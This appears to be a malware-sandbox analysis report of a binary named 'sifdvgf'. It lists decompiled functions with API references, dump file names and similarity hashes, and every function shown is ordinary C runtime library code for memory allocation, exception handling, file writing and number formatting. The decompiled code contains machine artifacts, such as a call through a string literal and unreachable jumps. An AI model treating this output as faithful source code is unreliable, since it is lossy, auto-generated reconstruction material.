Function 00406B56 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00406B56(char _a4) {
				signed int _v16;
				char _v20;
				long _v24;
				signed int _v32;
				void* _v36;
				long _v40;
				void _v60;
				void* __edi;
				void* _t20;
				signed int _t21;
				signed int _t26;
				DWORD* _t27;
				void* _t30;
				signed int _t34;
				void* _t38;

				while(1) {
					_t2 =  &_a4; // 0x405855
					_t20 = E004078D7(_t30, _t38,  *_t2);
					if(_t20 != 0) {
						break;
					}
					_t21 = E00409C75(_a4);
					__eflags = _t21;
					if(_t21 == 0) {
						__eflags =  *0x42e660 & 0x00000001;
						if(( *0x42e660 & 0x00000001) == 0) {
							 *0x42e660 =  *0x42e660 | 0x00000001;
							__eflags =  *0x42e660;
							E00406B3B(0x42e654);
							E00409C4F( *0x42e660, 0x417703);
						}
						E0040588A( &_v16, 0x42e654);
						_push(0x4177a0);
						_push( &_v16);
						L7();
						asm("int3");
						_push(0x42e654);
						_push(_t38);
						_t34 = 8;
						_v36 = memcpy( &_v60, 0x401518, _t34 << 2);
						_t26 = _v16;
						_v32 = _t26;
						__eflags = _t26;
						if(_t26 != 0) {
							__eflags =  *_t26 & 0x00000008;
							if(( *_t26 & 0x00000008) != 0) {
								_v20 = 0x1994000;
							}
						}
						_t27 =  &_v20;
						RaiseException(_v40, _v36, _v24, _t27);
						return _t27;
					} else {
						continue;
					}
					L11:
				}
				return _t20;
				goto L11;
			}

APIs

_malloc.LIBCMT ref: 00406B70

Part of subcall function 004078D7: __FF_MSGBANNER.LIBCMT ref: 004078FA
Part of subcall function 004078D7: __NMSG_WRITE.LIBCMT ref: 00407901
Part of subcall function 004078D7: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,004104F5,00000001,00000001,00000001,?,0040DAD7,00000018,00417BD8,0000000C,0040DB68), ref: 0040794E

std::bad_alloc::bad_alloc.LIBCMT ref: 00406B93

Part of subcall function 00406B3B: std::exception::exception.LIBCMT ref: 00406B47

__CxxThrowException@8.LIBCMT ref: 00406BB5

Strings

TB, xrefs: 00406B83
UX@, xrefs: 00406B6D

Memory Dump Source

Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::exception::exception
String ID: TB$UX@
API String ID: 3715980512-2156152108
Opcode ID: f5f13009a3e2b1de24221d6bad4e3344780dabd098660a51c124c6ab0b4c5c10
Instruction ID: e03a47e3d7dbfed10d582903bf367da44c0a492470d6b0e3d614105ffc528273
Opcode Fuzzy Hash: f5f13009a3e2b1de24221d6bad4e3344780dabd098660a51c124c6ab0b4c5c10
Instruction Fuzzy Hash: 5CF0E271A0412866DB187622DC06D5A3BB89B20318B51407FF813F10D2DF7DB952815D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2F1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040A2F1(void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _t11;
				intOrPtr* _t15;
				intOrPtr* _t19;
				void* _t23;

				_t25 = __edi;
				_t24 = __edx;
				_t11 =  *((intOrPtr*)( *_a4));
				if(_t11 == 0xe0434f4d) {
					__eflags =  *((intOrPtr*)(E00409F6C(_t23, __edx, __eflags) + 0x90));
					if(__eflags > 0) {
						_t15 = E00409F6C(_t23, __edx, __eflags) + 0x90;
						 *_t15 =  *_t15 - 1;
						__eflags =  *_t15;
					}
					goto L5;
				} else {
					_t32 = _t11 - 0xe06d7363;
					if(_t11 != 0xe06d7363) {
						L5:
						__eflags = 0;
						return 0;
					} else {
						 *(E00409F6C(_t23, __edx, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
						_push(8);
						_push(0x417b18);
						E0040C128(_t23, __edi, __esi);
						_t19 =  *((intOrPtr*)(E00409F6C(_t23, __edx, _t32) + 0x78));
						if(_t19 != 0) {
							_v8 = _v8 & 0x00000000;
							 *_t19();
							_v8 = 0xfffffffe;
						}
						return E0040C16D(E0041069C(_t23, _t24, _t25));
					}
				}
			}

APIs

__getptd.LIBCMT ref: 0040A30B

Part of subcall function 00409F6C: __getptd_noexit.LIBCMT ref: 00409F6F
Part of subcall function 00409F6C: __amsg_exit.LIBCMT ref: 00409F7C

__getptd.LIBCMT ref: 0040A31C
__getptd.LIBCMT ref: 0040A32A

Strings

csm, xrefs: 0040A304
MOC, xrefs: 0040A2FD

Memory Dump Source

Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$csm
API String ID: 803148776-1389381023
Opcode ID: afda627553e1d3404fb2c680ee2ca1c5e0fbcedafb92ff1583f665337c3a5b1c
Instruction ID: 622605f05806e43214a8a41ef03f34c1d013f3cc9fc1b6c3fd85fef28c091024
Opcode Fuzzy Hash: afda627553e1d3404fb2c680ee2ca1c5e0fbcedafb92ff1583f665337c3a5b1c
Instruction Fuzzy Hash: 11E09A36514304DFDB20AB75C04AB6A3698EB49318F1540B6A9C8D73A3D73CDCA4959B

Uniqueness

Uniqueness Score: -1.00%

Function 0040ECF3 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E0040ECF3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x417c18);
				E0040C128(__ebx, __edi, __esi);
				_t31 = E00409F6C(__ebx, __edx, _t35);
				_t15 =  *0x42d194; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040DB4D(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x42d098; // 0x22c15e8
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x42cc70;
								if(__eflags != 0) {
									_push(_t33);
									E004079A1(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x42d098; // 0x22c15e8
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x42d098; // 0x22c15e8
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E0040ED8E();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0040CCA3(_t29, 0x20);
				}
				return E0040C16D(_t33);
			}

APIs

__getptd.LIBCMT ref: 0040ECFF

Part of subcall function 00409F6C: __getptd_noexit.LIBCMT ref: 00409F6F
Part of subcall function 00409F6C: __amsg_exit.LIBCMT ref: 00409F7C

__amsg_exit.LIBCMT ref: 0040ED1F
__lock.LIBCMT ref: 0040ED2F
InterlockedDecrement.KERNEL32(?), ref: 0040ED4C
InterlockedIncrement.KERNEL32(022C15E8), ref: 0040ED77

Memory Dump Source

Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: f597ff586386ee98be70c95fc1552d6985489a0103feaeef2b68afe6ec2927bc
Instruction ID: 298bf980c9c0aec7c7d52094cac1c499a146b192491b880d0050c6e3868dceb6
Opcode Fuzzy Hash: f597ff586386ee98be70c95fc1552d6985489a0103feaeef2b68afe6ec2927bc
Instruction Fuzzy Hash: 75018E31E00622D7D721AB26A84579A7360EF04B29F00053BE914773D1C73C68A28BCD

Uniqueness

Uniqueness Score: -1.00%

Function 004079A1 Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 39%

			E004079A1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x417928);
				_t8 = E0040C128(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E0040C16D(_t8);
				}
				if( *0x42f134 != 3) {
					_push(_t23);
					L7:
					if(HeapFree( *0x42eb04, 0, ??) == 0) {
						_t10 = E00407F57();
						 *_t10 = E00407F15(GetLastError());
					}
					goto L9;
				}
				E0040DB4D(__ebx, __edi, 4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E0040DB80(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E0040DBB0();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E004079F7();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

APIs

__lock.LIBCMT ref: 004079BF

Part of subcall function 0040DB4D: __mtinitlocknum.LIBCMT ref: 0040DB63
Part of subcall function 0040DB4D: __amsg_exit.LIBCMT ref: 0040DB6F
Part of subcall function 0040DB4D: EnterCriticalSection.KERNEL32(00409F0F,00409F0F,?,0041588A,00000004,00417DC0,0000000C,0041053F,00000001,00409F1E,00000000,00000000,00000000,?,00409F1E,00000001), ref: 0040DB77

___sbh_find_block.LIBCMT ref: 004079CA
___sbh_free_block.LIBCMT ref: 004079D9
HeapFree.KERNEL32(00000000,00000001,00417928,0000000C,0040DB2E,00000000,00417BD8,0000000C,0040DB68,00000001,00409F0F,?,0041588A,00000004,00417DC0,0000000C), ref: 00407A09
GetLastError.KERNEL32(?,0041588A,00000004,00417DC0,0000000C,0041053F,00000001,00409F1E,00000000,00000000,00000000,?,00409F1E,00000001,00000214), ref: 00407A1A

Memory Dump Source

Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: c12663648c0d4e2af9016428884d4000b2d59aff5cd47b208b817aec9f7eb85a
Instruction ID: 8f777d082abfc0d878f9bfaaf4c1826c71b29845cb59ede7f12ddd66b922c452
Opcode Fuzzy Hash: c12663648c0d4e2af9016428884d4000b2d59aff5cd47b208b817aec9f7eb85a
Instruction Fuzzy Hash: 89014471E092069AEF20BBB69C06B5F7A649F00764F50053FF504BA1D1CA7CBA458E5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040A94F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 21%

			E0040A94F(void* __ebx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				intOrPtr _t19;
				void* _t21;
				void* _t22;
				void* _t24;
				intOrPtr* _t25;
				void* _t26;
				void* _t27;

				_t26 = __esi;
				_t25 = __edi;
				_t21 = __ebx;
				_t29 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E0040A8BD(__ebx, __edi, __esi, _t29);
					_t27 = _t27 + 0x10;
				}
				_t30 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t26);
				}
				E00406DBB(_t22);
				_push( *_t25);
				_push(_a16);
				_push(_a12);
				_push(_t26);
				E0040A33A(_t21, _t24, _t25, _t26, _t30);
				_push(0x100);
				_push(_a24);
				_t19 =  *((intOrPtr*)(_t25 + 4)) + 1;
				_push(_a16);
				 *((intOrPtr*)(_t26 + 8)) = _t19;
				_push(_a8);
				_push(_t26);
				_push(_a4);
				"j,hxzA"();
				if(_t19 != 0) {
					E00406D74(_t19, _t26);
					return _t19;
				}
				return _t19;
			}

APIs

___BuildCatchObject.LIBCMT ref: 0040A962

Part of subcall function 0040A8BD: ___BuildCatchObjectHelper.LIBCMT ref: 0040A8F3

_UnwindNestedFrames.LIBCMT ref: 0040A979
___FrameUnwindToState.LIBCMT ref: 0040A987

Strings

csm, xrefs: 0040A95E, 0040A973, 0040A986, 0040A9A4, 0040A9B4

Memory Dump Source

Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm
API String ID: 2163707966-1018135373
Opcode ID: f7775c5282b144064f6aa1fbcbd92dd75a2391eadffbc48365066a24746a3b62
Instruction ID: c18afe15dfa004b4b11c55b0fe6cb4d4148c85d4026d47cf0b1876583a05e907
Opcode Fuzzy Hash: f7775c5282b144064f6aa1fbcbd92dd75a2391eadffbc48365066a24746a3b62
Instruction Fuzzy Hash: 32012871100209BBDF126F52CC45EEE3E6AEF08394F058426BD09241A0D73A9972DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 004095AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E004095AF() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x4016f8;
					_v28 =  *0x4016f0;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

APIs

GetModuleHandleA.KERNEL32(KERNEL32,004068AA), ref: 004095B4
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 004095C4

Strings

KERNEL32, xrefs: 004095AF
IsProcessorFeaturePresent, xrefs: 004095BE

Memory Dump Source

Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 42ce375bee8a8cf742697974e5cdae8eb36b2f87cd69389d819ec3c053a1e79a
Instruction ID: 420fee4b7b8c9d102a00ce1403d5f9c7b68c6b4b741a890553f7b07840975166
Opcode Fuzzy Hash: 42ce375bee8a8cf742697974e5cdae8eb36b2f87cd69389d819ec3c053a1e79a
Instruction Fuzzy Hash: 01F09031A00A09E2DF012BA2BD0A36F7A79BB80746F9604B1E1D2F00E5CF3585B1824E

Uniqueness

Uniqueness Score: -1.00%

Function 0040C56B Relevance: 6.1, APIs: 4, Instructions: 137
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E0040C56B(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					if(_t100 != 0) {
						_t82 = _a4;
						__eflags = _t82;
						if(_t82 == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(_a12 > _t63 / _a8) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
										_t68 = E0040C407(_t97,  *_v8, _t100);
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											L34:
											_t69 = _t97;
											L35:
											return (_t69 - _t81) / _a8;
										}
										_v8 = _v8 + 1;
										_t72 =  *(_t100 + 0x18);
										_t81 = _t81 - 1;
										_v12 = _t72;
										__eflags = _t72;
										if(_t72 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t84;
									if(_t84 == 0) {
										L21:
										__eflags = _v12;
										_t98 = _t81;
										if(_v12 != 0) {
											_t75 = _t81;
											_t90 = _t75 % _v12;
											_t98 = _t98 - _t75 % _v12;
											__eflags = _t98;
										}
										_push(_t98);
										_push(_v8);
										_push(E0040C0F3(_t100));
										_t74 = E00411BEA(_t81, _t90, _t98, _t100, __eflags);
										_t101 = _t101 + 0xc;
										__eflags = _t74 - 0xffffffff;
										if(_t74 == 0xffffffff) {
											L36:
											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
											_t69 = _v16;
											goto L35;
										} else {
											_t88 = _t98;
											__eflags = _t74 - _t98;
											if(_t74 <= _t98) {
												_t88 = _t74;
											}
											_v8 = _v8 + _t88;
											_t81 = _t81 - _t88;
											__eflags = _t74 - _t98;
											if(_t74 < _t98) {
												goto L36;
											} else {
												L27:
												_t97 = _v16;
												goto L31;
											}
										}
									}
									_t77 = E0041098A(_t90, _t100);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t78 =  *(_t100 + 4);
								__eflags = _t78;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t48 = _t100 + 0xc;
									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
									__eflags =  *_t48;
									goto L34;
								}
								_t99 = _t81;
								__eflags = _t81 - _t78;
								if(_t81 >= _t78) {
									_t99 = _t78;
								}
								E00407BB0(_t81, _t99, _t100,  *_t100, _v8, _t99);
								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
								 *_t100 =  *_t100 + _t99;
								_t101 = _t101 + 0xc;
								_t81 = _t81 - _t99;
								_v8 = _v8 + _t99;
								goto L27;
								L31:
								__eflags = _t81;
							} while (_t81 != 0);
							goto L32;
						}
					}
					L3:
					_t61 = E00407F57();
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t61 = 0x16;
					E00406D3E(_t90, 0, _t100);
					goto L4;
				}
			}

APIs

__flush.LIBCMT ref: 0040C62F
__fileno.LIBCMT ref: 0040C64F
__locking.LIBCMT ref: 0040C656
__flsbuf.LIBCMT ref: 0040C681

Part of subcall function 00407F57: __getptd_noexit.LIBCMT ref: 00407F57

Part of subcall function 00406D3E: __decode_pointer.LIBCMT ref: 00406D49

Memory Dump Source

Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: 46fff19aee5ea9a8fc14b2be84dca0e4e1a437739d758bfb5711d77188212393
Instruction ID: 9b88df73e6d6caaa745b4f3553991fb21252c6c8a82537d4f00f019dc99cf697
Opcode Fuzzy Hash: 46fff19aee5ea9a8fc14b2be84dca0e4e1a437739d758bfb5711d77188212393
Instruction Fuzzy Hash: 4C41B571A00604EBDB24DF6A88D45AFB7B5AF80324F248B3BE455A72C0D779ED41CB48

Uniqueness

Uniqueness Score: -1.00%

Function 004169D6 Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004169D6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E004089C3( &_v20, _a16);
						if( *((intOrPtr*)(_v20 + 0x14)) != 0) {
							if(E00410D20( *_t72 & 0x000000ff,  &_v20) == 0) {
								if(MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
									L10:
									if(_v8 != 0) {
										 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
									}
									return 1;
								}
								L21:
								_t54 = E00407F57();
								 *_t54 = 0x2a;
								if(_v8 != 0) {
									_t54 = _v12;
									 *(_t54 + 0x70) =  *(_t54 + 0x70) & 0xfffffffd;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							if(_t65 <= 1 || _a12 < _t65) {
								L17:
								if(_a12 <  *(_t56 + 0xac) || _t72[1] == 0) {
									goto L21;
								} else {
									goto L19;
								}
							} else {
								_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
								_t56 = _v20;
								if(_t58 != 0) {
									L19:
									_t57 =  *(_t56 + 0xac);
									if(_v8 == 0) {
										return _t57;
									}
									 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
									return _t57;
								}
								goto L17;
							}
						}
						_t59 = _a4;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00416A0A
__isleadbyte_l.LIBCMT ref: 00416A3E
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 00416A6F
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 00416ADD

Memory Dump Source

Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 0bd4586eaa071df3d80ff8fe1865f9c236fdafe29b5be2a119ff0eb7e6a2e53d
Instruction ID: 3fcc8875d0a542d9fff72c78a7b0d81b7994ca812fa713602b319536ce183172
Opcode Fuzzy Hash: 0bd4586eaa071df3d80ff8fe1865f9c236fdafe29b5be2a119ff0eb7e6a2e53d
Instruction Fuzzy Hash: CA31E031A10285EFCB20DF64C8809FE3BB5BF02351B1685AAE466AB291D734DD80DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040947A Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040947A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00408D6B(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00408E5B(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00409380(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E004092C5(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

APIs

__cftof_l.LIBCMT ref: 004094A0

Part of subcall function 004092C5: __fltout2.LIBCMT ref: 004092F1

__cftog_l.LIBCMT ref: 004094C6
__cftoe_l.LIBCMT ref: 004094F8

Memory Dump Source

Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
